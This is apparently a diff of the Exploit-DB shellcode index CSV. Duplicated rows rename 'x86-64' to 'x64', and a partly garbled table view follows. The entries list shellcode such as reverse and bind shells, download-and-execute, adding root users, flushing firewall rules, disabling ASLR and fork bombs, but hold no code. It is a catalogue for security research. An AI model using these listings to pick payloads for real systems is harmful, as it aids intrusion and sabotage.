40781,shellcodes/windows_x86-64/40781.c,"Windows/x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40808,shellcodes/linux_x86-64/40808.c,"Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64
40821,shellcodes/windows_x86-64/40821.c,"Windows/x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86
40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86
40981,shellcodes/windows_x86-64/40981.c,"Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41072,shellcodes/windows_x86-64/41072.c,"Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41089,shellcodes/linux_x86-64/41089.c,"Linux/x86-64 - mkdir() Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64
41128,shellcodes/linux_x86-64/41128.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64
41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64
40981,shellcodes/windows_x86-64/40981.c,"Windows/x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41072,shellcodes/windows_x86-64/41072.c,"Windows/x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41089,shellcodes/linux_x86-64/41089.c,"Linux/x64 - mkdir() Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64
41128,shellcodes/linux_x86-64/41128.c,"Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64
41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x64 - execve(/bin/sh) Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64
41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux
41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator
41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86
41375,shellcodes/linux/41375.c,"Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux
41381,shellcodes/windows_x86/41381.c,"Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,windows_x86
41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64
41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64
41403,shellcodes/linux_x86/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,shellcode,linux_x86
41439,shellcodes/linux_x86-64/41439.c,"Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64
41439,shellcodes/linux_x86-64/41439.c,"Linux/x64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64
41467,shellcodes/windows_x86/41467.c,"Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,windows_x86
41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64
41477,shellcodes/linux_x86-64/41477.c,"Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64
41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64
41477,shellcodes/linux_x86-64/41477.c,"Linux/x64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64
41481,shellcodes/windows_x86/41481.asm,"Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86
41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41581,shellcodes/windows_x86/41581.c,"Windows/x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86
43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86
43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve(/bin/dash) Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86
@ -792,8 +793,8 @@ id,file,description,date,author,type,platform
43483,shellcodes/bsd_x86/43483.c,"BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)",2009-01-01,"Jihyeog Lim",shellcode,bsd_x86
43489,shellcodes/linux_x86/43489.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,linux_x86
43497,shellcodes/arm/43497.asm,"Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)",2018-01-11,Azeria,shellcode,arm
43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64
43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64
43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x64 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64
43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64
43504,shellcodes/freebsd_x86/43504.asm,"FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)",2009-01-01,Tosh,shellcode,freebsd_x86
43505,shellcodes/freebsd_x86/43505.c,"FreeBSD/x86 - /sbin/pfctl -F all Shellcode (47 bytes)",2009-01-01,antrhacks,shellcode,freebsd_x86
43506,shellcodes/freebsd_x86/43506.c,"FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes)",2009-01-01,zillion,shellcode,freebsd_x86
@ -817,46 +818,46 @@ id,file,description,date,author,type,platform
43541,shellcodes/superh_sh4/43541.c,"Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes)",2011-06-22,"Florian Gaultier",shellcode,superh_sh4
43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4
43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc
43549,shellcodes/linux_x86-64/43549.c,"Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64
43550,shellcodes/linux_x86-64/43550.c,"Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43551,shellcodes/linux_x86-64/43551.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43552,shellcodes/linux_x86-64/43552.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43553,shellcodes/linux_x86-64/43553.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43554,shellcodes/linux_x86-64/43554.c,"Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
43555,shellcodes/linux_x86-64/43555.c,"Linux/x86-64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43556,shellcodes/linux_x86-64/43556.asm,"Linux/x86-64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43557,shellcodes/linux_x86-64/43557.asm,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43558,shellcodes/linux_x86-64/43558.asm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64
43559,shellcodes/linux_x86-64/43559.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64
43561,shellcodes/linux_x86-64/43561.asm,"Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64
43549,shellcodes/linux_x86-64/43549.c,"Linux/x64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64
43550,shellcodes/linux_x86-64/43550.c,"Linux/x64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43551,shellcodes/linux_x86-64/43551.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43552,shellcodes/linux_x86-64/43552.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43553,shellcodes/linux_x86-64/43553.c,"Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43554,shellcodes/linux_x86-64/43554.c,"Linux/x64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
43555,shellcodes/linux_x86-64/43555.c,"Linux/x64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43556,shellcodes/linux_x86-64/43556.asm,"Linux/x64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43557,shellcodes/linux_x86-64/43557.asm,"Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43558,shellcodes/linux_x86-64/43558.asm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64
43559,shellcodes/linux_x86-64/43559.asm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64
43561,shellcodes/linux_x86-64/43561.asm,"Linux/x64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64
41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86
41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86
41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86
43734,shellcodes/linux_x86/43734.c,"Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
41750,shellcodes/linux_x86-64/41750.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64
41750,shellcodes/linux_x86-64/41750.asm,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64
41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4)",2017-03-29,WangYihang,shellcode,linux_x86
41827,shellcodes/windows_x86-64/41827.txt,"Windows/x86-64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64
41883,shellcodes/linux_x86-64/41883.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64
41827,shellcodes/windows_x86-64/41827.asm,"Windows/x64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64
41883,shellcodes/linux_x86-64/41883.txt,"Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64
41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86
41969,shellcodes/linux_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,linux_x86
41970,shellcodes/linux_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64
42016,shellcodes/windows/42016.asm,"Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows
42126,shellcodes/linux_x86-64/42126.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64
41970,shellcodes/linux_x86-64/41970.asm,"Linux/x64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64
42016,shellcodes/windows/42016.asm,"Windows - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows
42126,shellcodes/linux_x86-64/42126.c,"Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64
42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86
42179,shellcodes/linux_x86-64/42179.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64
42179,shellcodes/linux_x86-64/42179.c,"Linux/x64 - execve(/bin/sh) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64
42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86
42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86
42339,shellcodes/linux_x86-64/42339.c,"Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64
42339,shellcodes/linux_x86-64/42339.c,"Linux/x64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64
42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86
42485,shellcodes/linux_x86-64/42485.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64
42522,shellcodes/linux_x86-64/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42523,shellcodes/linux_x86-64/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42485,shellcodes/linux_x86-64/42485.c,"Linux/x64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64
42522,shellcodes/linux_x86-64/42522.c,"Linux/x64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42523,shellcodes/linux_x86-64/42523.c,"Linux/x64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42594,shellcodes/linux_x86/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",shellcode,linux_x86
42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42791,shellcodes/linux_x86-64/42791.c,"Linux/x86-64 - mkdir(evil) Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64
42791,shellcodes/linux_x86-64/42791.c,"Linux/x64 - mkdir(evil) Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64
42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86
42992,shellcodes/windows_x86-64/42992.c,"Windows/x86-64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
42992,shellcodes/windows_x86-64/42992.c,"Windows/x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86

1 id file description date author type platform
2 14113 shellcodes/arm/14113.txt shellcodes/arm/14113.c Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes) 2010-06-29 Jonathan Salwan shellcode arm
3 13241 shellcodes/aix/13241.c AIX - execve(/bin/sh) Shellcode (88 bytes) 2004-09-26 Georgi Guninski shellcode aix
4 13242 shellcodes/bsd/13242.txt BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes) 2000-11-19 Scrippie shellcode bsd
5 13243 shellcodes/bsd_ppc/13243.c BSD/PPC - execve(/bin/sh) Shellcode (128 bytes) 2004-09-26 Palante shellcode bsd_ppc
36 13276 shellcodes/freebsd_x86/13276.c FreeBSD/x86 - chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes) 2004-09-26 Claes M. Nyberg shellcode freebsd_x86
37 13277 shellcodes/freebsd_x86/13277.c FreeBSD/x86 - execve(/tmp/sh) Shellcode (34 bytes) 2004-09-26 Claes M. Nyberg shellcode freebsd_x86
38 13278 shellcodes/freebsd_x86/13278.asm FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes) 2004-09-26 Scrippie shellcode freebsd_x86
39 13279 shellcodes/freebsd_x86-64/13279.c FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes) FreeBSD/x64 - exec /bin/sh Shellcode (31 bytes) 2009-05-18 Hack'n Roll shellcode freebsd_x86-64
40 13280 shellcodes/freebsd_x86-64/13280.c FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes) FreeBSD/x64 - execve(/bin/sh) Shellcode (34 bytes) 2009-05-15 c0d3_z3r0 shellcode freebsd_x86-64
41 13281 shellcodes/generator/13281.c Linux/x86 - execve() + Null-Free Shellcode (Generator) 2009-06-29 certaindeath shellcode generator
42 13282 shellcodes/generator/13282.php Linux/x86 - Bind TCP Shell Shellcode (Generator) 2009-06-09 Jonathan Salwan shellcode generator
43 13283 shellcodes/generator/13283.php Windows (XP SP1) - Bind TCP Shell Shellcode (Generator) 2009-06-09 Jonathan Salwan shellcode generator
51 13292 shellcodes/hardware/13292.asm Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) 2008-08-13 Varun Uppal shellcode hardware
52 13293 shellcodes/hardware/13293.asm Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode 2008-08-13 Gyan Chawdhary shellcode hardware
53 13295 shellcodes/hp-ux/13295.c HP-UX - execve(/bin/sh) Shellcode (58 bytes) 2004-09-26 K2 shellcode hp-ux
54 13296 shellcodes/linux_x86-64/13296.c Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes) Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes) 2008-11-28 gat3way shellcode linux_x86-64
55 13297 shellcodes/generator/13297.c Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator) Linux/x64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator) 2006-04-21 phar shellcode generator
56 13298 shellcodes/linux_mips/13298.c Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes) 2008-08-18 vaicebine shellcode linux_mips
57 13299 shellcodes/linux_mips/13299.c Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes) 2008-08-18 vaicebine shellcode linux_mips
58 13300 shellcodes/linux_mips/13300.c Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes) 2005-11-09 core shellcode linux_mips
75 13317 shellcodes/linux_x86/13317.s Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes) 2009-06-08 Jonathan Salwan shellcode linux_x86
76 13318 shellcodes/linux_x86/13318.s Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes) 2009-06-08 Jonathan Salwan shellcode linux_x86
77 13319 shellcodes/linux_x86/13319.s Linux/x86 - Bind TCP (8000/TCP) Shell (/bin/sh) Shellcode (179 bytes) 2009-06-01 Jonathan Salwan shellcode linux_x86
78 13320 shellcodes/linux_x86-64/13320.c Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes) Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes) 2009-05-14 evil.xi4oyu shellcode linux_x86-64
79 13321 shellcodes/linux_x86/13321.c Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes) 2009-04-30 phar shellcode linux_x86
80 13322 shellcodes/linux_x86/13322.c Linux/x86 - File Unlinker Shellcode (18+ bytes) 2009-03-03 darkjoker shellcode linux_x86
81 13323 shellcodes/linux_x86/13323.c Linux/x86 - Perl Script Execution Shellcode (99+ bytes) 2009-03-03 darkjoker shellcode linux_x86
179 13421 shellcodes/linux_x86/13421.c Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes) 2004-12-22 xort shellcode linux_x86
180 13422 shellcodes/linux_x86/13422.c Linux/x86 - execve() Shellcode (23 bytes) 2004-11-15 marcetam shellcode linux_x86
181 13423 shellcodes/linux_x86/13423.c Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes) 2004-11-15 zasta shellcode linux_x86
182 13424 shellcodes/linux_x86/13424.txt shellcodes/linux_x86/13424.c Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes) 2004-09-26 RaiSe shellcode linux_x86
183 13425 shellcodes/linux_x86/13425.c Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes) 2004-09-26 anathema shellcode linux_x86
184 13426 shellcodes/bsd_x86/13426.c BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes) 2004-09-26 dev0id shellcode bsd_x86
185 13427 shellcodes/linux_x86/13427.c Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes) 2004-09-26 Tora shellcode linux_x86
218 13460 shellcodes/linux_x86/13460.c Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes) 2000-08-08 anonymous shellcode linux_x86
219 13461 shellcodes/linux_x86/13461.c Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes) 2000-08-07 anonymous shellcode linux_x86
